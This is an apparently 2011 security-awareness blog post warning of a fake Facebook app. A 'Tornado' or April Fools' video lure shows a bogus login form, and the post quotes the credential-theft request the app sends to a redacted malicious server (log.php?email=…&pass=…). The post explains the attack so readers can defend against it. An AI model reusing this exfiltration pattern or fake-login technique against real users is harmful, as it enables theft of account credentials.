Another Fake Facebook App is Here to Steal your Passwords

21 Apr
Hi Fellas,

Recently, there has been an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook.

Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is logged in to Facebook, the malicious app will log the user out and ask him/her to log in again

When the user clicks on the “Login” button, it will show the login form.

When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to, and the other to the malicious server. The request sent to the malicious server has the following format:

http://IPRemoved/log.php?email=<email address>&pass=<password>

Using best practice advice, one can check the URL information bar to determine the destination of the URL—but that isn’t enough in this case. The URL bar will show when the login form is displayed, even though the credentials will be posted to a malicious site instead.

The bogus app also “likes” the link in an automatic post, which will be displayed on the user’s profile

A similar attack was also observed to be hosted on the same IP address. It displays a different message: “Video: This is the best April Fools’ prank ever!” This attack also employs the same technique, as mentioned above, in order to steal usernames and passwords for users’ Facebook accounts
NB: Hence forth, SMS won’t be coming anymore, the alerts are going to be coming to your emails. Thanks for being careful even as you play on the wild (Internet).
~Good luck~

Leave a comment

Posted by on April 21, 2011 in Information Security


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: